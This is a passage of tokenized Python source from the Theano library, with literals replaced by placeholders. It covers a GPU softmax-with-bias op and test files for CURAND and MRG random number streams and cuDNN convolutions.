type ( ) ] ) <EOL> def infer_shape ( self , node , shape ) : <EOL> return [ shape [ <NUM_LIT:0> ] ] <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:9> , ) + inline_softmax . code_version <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> x , b = inp <EOL> z , = out <EOL> fail = sub [ '<STR_LIT>' ] <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def c_support_code_apply ( self , node , nodename ) : <EOL> ret1 = nvcc_kernel ( <EOL> "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax ( '<STR_LIT:N>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> ret2 = nvcc_kernel ( "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax_fixed_shared ( '<STR_LIT:N>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> return ret1 + "<STR_LIT:\n>" + ret2 <EOL> gpu_softmax_with_bias = GpuSoftmaxWithBias ( ) </s>
<s> from __future__ import print_function <EOL> import numpy <EOL> import theano <EOL> from theano . tensor import constant <EOL> from theano . sandbox . cuda . rng_curand import CURAND_RandomStreams <EOL> from theano . sandbox . rng_mrg import MRG_RandomStreams <EOL> from nose . plugins . skip import SkipTest <EOL> import theano . sandbox . cuda as cuda_ndarray <EOL> if cuda_ndarray . cuda_available == False : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> if theano . config . mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> mode_with_gpu = theano . compile . mode . get_mode ( '<STR_LIT>' ) . including ( '<STR_LIT>' ) <EOL> else : <EOL> mode_with_gpu = theano . compile . mode . get_default_mode ( ) . including ( '<STR_LIT>' ) <EOL> def check_uniform_basic ( shape_as_symbolic , dim_as_symbolic = False ) : <EOL> """<STR_LIT>""" <EOL> rng = CURAND_RandomStreams ( <NUM_LIT> ) <EOL> if shape_as_symbolic : <EOL> shape = constant ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> else : <EOL> if dim_as_symbolic : <EOL> shape = ( <NUM_LIT:10> , constant ( <NUM_LIT:10> ) ) <EOL> else : <EOL> shape = ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> u0 = rng . uniform ( shape ) <EOL> u1 = rng . uniform ( shape ) <EOL> f0 = theano . function ( [ ] , u0 , mode = mode_with_gpu ) <EOL> f1 = theano . function ( [ ] , u1 , mode = mode_with_gpu ) <EOL> v0list = [ f0 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> v1list = [ f1 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v0list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v1list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:0> ] ) <EOL> for v in v0list : <EOL> assert v . shape == ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> assert v . min ( ) >= <NUM_LIT:0> <EOL> assert v . max ( ) <= <NUM_LIT:1> <EOL> assert v . min ( ) < v . max ( ) <EOL> assert <NUM_LIT> <= v . 
mean ( ) <= <NUM_LIT> <EOL> def test_uniform_basic ( ) : <EOL> """<STR_LIT>""" <EOL> yield check_uniform_basic , False <EOL> yield check_uniform_basic , False , True <EOL> yield check_uniform_basic , True <EOL> def check_normal_basic ( shape_as_symbolic , dim_as_symbolic = False ) : <EOL> """<STR_LIT>""" <EOL> rng = CURAND_RandomStreams ( <NUM_LIT> ) <EOL> if shape_as_symbolic : <EOL> shape = constant ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> else : <EOL> if dim_as_symbolic : <EOL> shape = ( <NUM_LIT:10> , constant ( <NUM_LIT:10> ) ) <EOL> else : <EOL> shape = ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> u0 = rng . normal ( shape ) <EOL> u1 = rng . normal ( shape ) <EOL> f0 = theano . function ( [ ] , u0 , mode = mode_with_gpu ) <EOL> f1 = theano . function ( [ ] , u1 , mode = mode_with_gpu ) <EOL> v0list = [ f0 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> v1list = [ f1 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v0list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v1list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:0> ] ) <EOL> for v in v0list : <EOL> assert v . shape == ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> assert v . min ( ) < v . max ( ) <EOL> assert - <NUM_LIT> <= v . mean ( ) <= <NUM_LIT> <EOL> def test_normal_basic ( ) : <EOL> """<STR_LIT>""" <EOL> yield check_normal_basic , False <EOL> yield check_normal_basic , False , True <EOL> yield check_normal_basic , True <EOL> def compare_speed ( ) : <EOL> mrg = MRG_RandomStreams ( ) <EOL> crn = CURAND_RandomStreams ( <NUM_LIT> ) <EOL> N = <NUM_LIT:1000> * <NUM_LIT:100> <EOL> dest = theano . shared ( numpy . zeros ( N , dtype = theano . config . floatX ) ) <EOL> mrg_u = theano . function ( [ ] , [ ] , updates = { dest : mrg . uniform ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> crn_u = theano . function ( [ ] , [ ] , updates = { dest : crn . 
uniform ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> mrg_n = theano . function ( [ ] , [ ] , updates = { dest : mrg . normal ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> crn_n = theano . function ( [ ] , [ ] , updates = { dest : crn . normal ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> for f in mrg_u , crn_u , mrg_n , crn_n : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> theano . printing . debugprint ( f ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> for f in mrg_u , crn_u , mrg_n , crn_n : <EOL> f . fn . time_thunks = ( i > <NUM_LIT:0> ) <EOL> f ( ) </s>
<s> from nose . plugins . skip import SkipTest <EOL> from theano . tensor . nnet . tests import test_abstract_conv <EOL> from . . type import GpuArrayType , gpuarray_shared_constructor <EOL> from . . dnn import dnn_available , GpuDnnConv , GpuDnnConvGradW , GpuDnnConvGradI <EOL> from . config import mode_with_gpu , test_ctx_name <EOL> gpu_ftensor4 = GpuArrayType ( dtype = '<STR_LIT>' , broadcastable = ( False , ) * <NUM_LIT:4> ) <EOL> class TestDnnConv2d ( test_abstract_conv . BaseTestConv2d ) : <EOL> def setUp ( self ) : <EOL> super ( TestDnnConv2d , self ) . setUp ( ) <EOL> self . shared = gpuarray_shared_constructor <EOL> self . provide_shape = [ False ] <EOL> def tcase ( self , i , f , s , b , flip , provide_shape ) : <EOL> if not dnn_available ( test_ctx_name ) : <EOL> raise SkipTest ( dnn_available . msg ) <EOL> mode = mode_with_gpu <EOL> o = self . get_output_shape ( i , f , s , b ) <EOL> self . run_fwd ( inputs_shape = i , filters_shape = f , subsample = s , <EOL> verify_grad = True , mode = mode , <EOL> provide_shape = provide_shape , border_mode = b , <EOL> filter_flip = flip , target_op = GpuDnnConv ) <EOL> self . run_gradweight ( inputs_shape = i , filters_shape = f , <EOL> output_shape = o , subsample = s , <EOL> verify_grad = True , mode = mode , <EOL> provide_shape = provide_shape , border_mode = b , <EOL> filter_flip = flip , target_op = GpuDnnConvGradW ) <EOL> self . run_gradinput ( inputs_shape = i , filters_shape = f , <EOL> output_shape = o , subsample = s , <EOL> verify_grad = True , mode = mode , <EOL> provide_shape = provide_shape , border_mode = b , <EOL> filter_flip = flip , target_op = GpuDnnConvGradI ) <EOL> class TestDnnConvTypes ( test_abstract_conv . TestConvTypes ) : <EOL> def setUp ( self ) : <EOL> self . input = gpu_ftensor4 ( ) <EOL> self . filters = gpu_ftensor4 ( ) <EOL> self . topgrad = gpu_ftensor4 ( ) </s>
<s> from __future__ import print_function <EOL> import copy <EOL> import os <EOL> import sys <EOL> import time <EOL> import unittest <EOL> from nose . plugins . skip import SkipTest <EOL> from nose . tools import assert_raises <EOL> import numpy <EOL> from six . moves import xrange <EOL> import theano <EOL> from theano import tensor , config <EOL> from theano . sandbox import rng_mrg <EOL> from theano . sandbox . rng_mrg import MRG_RandomStreams <EOL> from theano . sandbox . cuda import cuda_available <EOL> from theano . tests import unittest_tools as utt <EOL> from theano . tests . unittest_tools import attr <EOL> if cuda_available : <EOL> from theano . sandbox . cuda import float32_shared_constructor <EOL> mode = config . mode <EOL> mode_with_gpu = theano . compile . mode . get_default_mode ( ) . including ( '<STR_LIT>' ) <EOL> utt . seed_rng ( ) <EOL> java_samples = numpy . loadtxt ( os . path . join ( os . path . split ( theano . __file__ ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> def test_deterministic ( ) : <EOL> seed = utt . fetch_seed ( ) <EOL> sample_size = ( <NUM_LIT:10> , <NUM_LIT:20> ) <EOL> test_use_cuda = [ False ] <EOL> if cuda_available : <EOL> test_use_cuda . append ( True ) <EOL> for use_cuda in test_use_cuda : <EOL> R = MRG_RandomStreams ( seed = seed , use_cuda = use_cuda ) <EOL> u = R . uniform ( size = sample_size ) <EOL> f = theano . function ( [ ] , u ) <EOL> fsample1 = f ( ) <EOL> fsample2 = f ( ) <EOL> assert not numpy . allclose ( fsample1 , fsample2 ) <EOL> R2 = MRG_RandomStreams ( seed = seed , use_cuda = use_cuda ) <EOL> u2 = R2 . uniform ( size = sample_size ) <EOL> g = theano . function ( [ ] , u2 ) <EOL> gsample1 = g ( ) <EOL> gsample2 = g ( ) <EOL> assert numpy . allclose ( fsample1 , gsample1 ) <EOL> assert numpy . 
allclose ( fsample2 , gsample2 ) <EOL> def test_consistency_randomstreams ( ) : <EOL> """<STR_LIT>""" <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> test_use_cuda = [ False ] <EOL> if cuda_available : <EOL> test_use_cuda . append ( True ) <EOL> for use_cuda in test_use_cuda : <EOL> samples = [ ] <EOL> rng = MRG_RandomStreams ( seed = seed , use_cuda = use_cuda ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> u = rng . uniform ( size = ( n_substreams , ) , nstreams = n_substreams ) <EOL> f = theano . function ( [ ] , u ) <EOL> for j in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> stream_samples = numpy . array ( stream_samples ) <EOL> stream_samples = stream_samples . T . flatten ( ) <EOL> samples . append ( stream_samples ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_cpu_serial ( ) : <EOL> """<STR_LIT>""" <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_rstate = curr_rstate . copy ( ) <EOL> for j in range ( n_substreams ) : <EOL> rstate = theano . shared ( numpy . array ( [ stream_rstate . copy ( ) ] , <EOL> dtype = '<STR_LIT>' ) ) <EOL> new_rstate , sample = rng_mrg . mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = config . floatX , <EOL> size = ( <NUM_LIT:1> , ) ) <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> rstate . default_update = new_rstate <EOL> f = theano . function ( [ ] , sample ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> samples . append ( s ) <EOL> stream_rstate = rng_mrg . ff_2p72 ( stream_rstate ) <EOL> curr_rstate = rng_mrg . 
ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_cpu_parallel ( ) : <EOL> """<STR_LIT>""" <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> rstate = [ curr_rstate . copy ( ) ] <EOL> for j in range ( <NUM_LIT:1> , n_substreams ) : <EOL> rstate . append ( rng_mrg . ff_2p72 ( rstate [ - <NUM_LIT:1> ] ) ) <EOL> rstate = numpy . asarray ( rstate ) <EOL> rstate = theano . shared ( rstate ) <EOL> new_rstate , sample = rng_mrg . mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = config . floatX , <EOL> size = ( n_substreams , ) ) <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> rstate . default_update = new_rstate <EOL> f = theano . function ( [ ] , sample ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> samples . append ( numpy . array ( stream_samples ) . T . flatten ( ) ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_GPU_serial ( ) : <EOL> """<STR_LIT>""" <EOL> if not cuda_available : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> if config . mode == '<STR_LIT>' : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = config . mode <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_rstate = curr_rstate . 
copy ( ) <EOL> for j in range ( n_substreams ) : <EOL> substream_rstate = numpy . array ( stream_rstate . copy ( ) , dtype = '<STR_LIT>' ) <EOL> tmp_float_buf = numpy . frombuffer ( substream_rstate . data , <EOL> dtype = '<STR_LIT>' ) <EOL> rstate = float32_shared_constructor ( tmp_float_buf ) <EOL> new_rstate , sample = rng_mrg . GPU_mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( <NUM_LIT:1> , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> samples . append ( s ) <EOL> stream_rstate = rng_mrg . ff_2p72 ( stream_rstate ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_GPU_parallel ( ) : <EOL> """<STR_LIT>""" <EOL> if not cuda_available : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> if config . mode == '<STR_LIT>' : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = config . mode <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> rstate = [ curr_rstate . copy ( ) ] <EOL> for j in range ( <NUM_LIT:1> , n_substreams ) : <EOL> rstate . append ( rng_mrg . ff_2p72 ( rstate [ - <NUM_LIT:1> ] ) ) <EOL> rstate = numpy . asarray ( rstate ) . flatten ( ) <EOL> tmp_float_buf = numpy . frombuffer ( rstate . data , dtype = '<STR_LIT>' ) <EOL> rstate = float32_shared_constructor ( tmp_float_buf ) <EOL> new_rstate , sample = rng_mrg . GPU_mrg_uniform . 
new ( rstate , ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( n_substreams , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> samples . append ( numpy . array ( stream_samples ) . T . flatten ( ) ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_GPU_nstreams_limit ( ) : <EOL> """<STR_LIT>""" <EOL> if not cuda_available : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> seed = <NUM_LIT> <EOL> R = MRG_RandomStreams ( seed = seed , use_cuda = True ) <EOL> def eval_uniform ( size , nstreams ) : <EOL> if theano . config . mode == "<STR_LIT>" : <EOL> mode = "<STR_LIT>" <EOL> else : <EOL> mode = copy . copy ( theano . compile . get_default_mode ( ) ) <EOL> mode . check_py_code = False <EOL> out = R . uniform ( size = size , nstreams = nstreams , dtype = '<STR_LIT>' ) <EOL> f = theano . function ( [ ] , out , mode = mode ) <EOL> return f ( ) <EOL> eval_uniform ( ( <NUM_LIT:10> , ) , <NUM_LIT:2> ** <NUM_LIT:20> ) <EOL> assert_raises ( ValueError , eval_uniform , ( <NUM_LIT:10> , ) , <NUM_LIT:2> ** <NUM_LIT:20> + <NUM_LIT:1> ) <EOL> def test_consistency_GPUA_serial ( ) : <EOL> """<STR_LIT>""" <EOL> from theano . sandbox . gpuarray . tests . test_basic_ops import mode_with_gpu as mode <EOL> from theano . sandbox . gpuarray . type import gpuarray_shared_constructor <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . 
array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_rstate = curr_rstate . copy ( ) <EOL> for j in range ( n_substreams ) : <EOL> substream_rstate = numpy . array ( [ stream_rstate . copy ( ) ] , <EOL> dtype = '<STR_LIT>' ) <EOL> rstate = gpuarray_shared_constructor ( substream_rstate ) <EOL> new_rstate , sample = rng_mrg . GPUA_mrg_uniform . new ( rstate , <EOL> ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( <NUM_LIT:1> , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> samples . append ( s ) <EOL> stream_rstate = rng_mrg . ff_2p72 ( stream_rstate ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_GPUA_parallel ( ) : <EOL> """<STR_LIT>""" <EOL> from theano . sandbox . gpuarray . tests . test_basic_ops import mode_with_gpu as mode <EOL> from theano . sandbox . gpuarray . type import gpuarray_shared_constructor <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> rstate = [ curr_rstate . copy ( ) ] <EOL> for j in range ( <NUM_LIT:1> , n_substreams ) : <EOL> rstate . append ( rng_mrg . ff_2p72 ( rstate [ - <NUM_LIT:1> ] ) ) <EOL> rstate = numpy . asarray ( rstate ) <EOL> rstate = gpuarray_shared_constructor ( rstate ) <EOL> new_rstate , sample = rng_mrg . GPUA_mrg_uniform . 
new ( rstate , ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( n_substreams , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> samples . append ( numpy . array ( stream_samples ) . T . flatten ( ) ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def basictest ( f , steps , sample_size , prefix = "<STR_LIT>" , allow_01 = False , inputs = None , <EOL> target_avg = <NUM_LIT:0.5> , target_std = None , mean_rtol = <NUM_LIT> , std_tol = <NUM_LIT> ) : <EOL> if inputs is None : <EOL> inputs = [ ] <EOL> dt = <NUM_LIT:0.0> <EOL> avg_var = <NUM_LIT:0.0> <EOL> for i in xrange ( steps ) : <EOL> t0 = time . time ( ) <EOL> ival = f ( * inputs ) <EOL> assert ival . shape == sample_size <EOL> dt += time . time ( ) - t0 <EOL> ival = numpy . asarray ( ival ) <EOL> if i == <NUM_LIT:0> : <EOL> mean = numpy . array ( ival , copy = True ) <EOL> avg_var = numpy . mean ( ( ival - target_avg ) ** <NUM_LIT:2> ) <EOL> min_ = ival . min ( ) <EOL> max_ = ival . max ( ) <EOL> else : <EOL> alpha = <NUM_LIT:1.0> / ( <NUM_LIT:1> + i ) <EOL> mean = alpha * ival + ( <NUM_LIT:1> - alpha ) * mean <EOL> avg_var = ( alpha * numpy . mean ( ( ival - target_avg ) ** <NUM_LIT:2> ) + <EOL> ( <NUM_LIT:1> - alpha ) * avg_var ) <EOL> min_ = min ( min_ , ival . min ( ) ) <EOL> max_ = max ( max_ , ival . max ( ) ) <EOL> if not allow_01 : <EOL> assert min_ > <NUM_LIT:0> <EOL> assert max_ < <NUM_LIT:1> <EOL> if hasattr ( target_avg , '<STR_LIT>' ) : <EOL> diff = numpy . mean ( abs ( mean - target_avg ) ) <EOL> assert numpy . 
all ( diff < mean_rtol * ( <NUM_LIT:1> + abs ( target_avg ) ) ) , ( <EOL> '<STR_LIT>' % ( mean , target_avg ) ) <EOL> else : <EOL> mean = numpy . mean ( mean ) <EOL> assert abs ( mean - target_avg ) < mean_rtol * ( <NUM_LIT:1> + abs ( target_avg ) ) , ( <EOL> '<STR_LIT>' % ( mean , target_avg ) ) <EOL> std = numpy . sqrt ( avg_var ) <EOL> if target_std is not None : <EOL> assert abs ( std - target_std ) < std_tol * ( <NUM_LIT:1> + abs ( target_std ) ) , ( <EOL> '<STR_LIT>' % ( std , target_std , std_tol ) ) <EOL> def test_uniform ( ) : <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT:10> , <NUM_LIT:100> ) <EOL> steps = <NUM_LIT:50> <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> steps = int ( <NUM_LIT> ) <EOL> x = tensor . matrix ( ) <EOL> for size , const_size , var_input , input in [ <EOL> ( sample_size , sample_size , [ ] , [ ] ) , <EOL> ( x . shape , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( x . shape [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] ) , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( ) , ( ) , [ ] , [ ] ) , <EOL> ] : <EOL> x = tensor . matrix ( ) <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> u = R . uniform ( size = size , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> f = theano . function ( var_input , u , mode = mode ) <EOL> assert any ( [ isinstance ( node . op , theano . sandbox . rng_mrg . mrg_uniform ) <EOL> for node in f . maker . fgraph . toposort ( ) ] ) <EOL> cpu_out = f ( * input ) <EOL> if numpy . 
prod ( const_size ) < <NUM_LIT:10> : <EOL> steps_ = steps * <NUM_LIT:100> <EOL> else : <EOL> steps_ = steps <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , inputs = input ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> u = R . uniform ( size = size , dtype = '<STR_LIT>' , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> assert u . dtype == '<STR_LIT>' <EOL> f = theano . function ( var_input , theano . Out ( <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( u ) , <EOL> borrow = True ) , mode = mode_with_gpu ) <EOL> assert any ( [ isinstance ( node . op , <EOL> theano . sandbox . rng_mrg . GPU_mrg_uniform ) <EOL> for node in f . maker . fgraph . toposort ( ) ] ) <EOL> gpu_out = numpy . asarray ( f ( * input ) ) <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , inputs = input ) <EOL> numpy . testing . assert_array_almost_equal ( cpu_out , gpu_out , <EOL> decimal = <NUM_LIT:6> ) <EOL> RR = theano . tensor . shared_randomstreams . RandomStreams ( <NUM_LIT> ) <EOL> uu = RR . uniform ( size = size ) <EOL> ff = theano . function ( var_input , uu , mode = mode ) <EOL> basictest ( ff , steps_ , const_size , prefix = '<STR_LIT>' , <EOL> allow_01 = True , inputs = input ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_binomial ( ) : <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT:10> , <NUM_LIT:50> ) <EOL> steps = <NUM_LIT:50> <EOL> rtol = <NUM_LIT> <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> steps = int ( <NUM_LIT> ) <EOL> rtol = <NUM_LIT> <EOL> x = tensor . matrix ( ) <EOL> for mean in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> ] : <EOL> for size , const_size , var_input , input in [ <EOL> ( sample_size , sample_size , [ ] , [ ] ) , <EOL> ( x . shape , sample_size , [ x ] , <EOL> [ numpy . 
zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( x . shape [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] ) , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] ) , <EOL> ( ( ) , ( ) , [ ] , [ ] ) , <EOL> ] : <EOL> yield ( t_binomial , mean , size , const_size , var_input , input , <EOL> steps , rtol ) <EOL> def t_binomial ( mean , size , const_size , var_input , input , steps , rtol ) : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> u = R . binomial ( size = size , p = mean ) <EOL> f = theano . function ( var_input , u , mode = mode ) <EOL> out = f ( * input ) <EOL> if numpy . prod ( const_size ) < <NUM_LIT:10> : <EOL> steps_ = steps * <NUM_LIT:100> <EOL> else : <EOL> steps_ = steps <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , <EOL> inputs = input , allow_01 = True , <EOL> target_avg = mean , mean_rtol = rtol ) <EOL> if 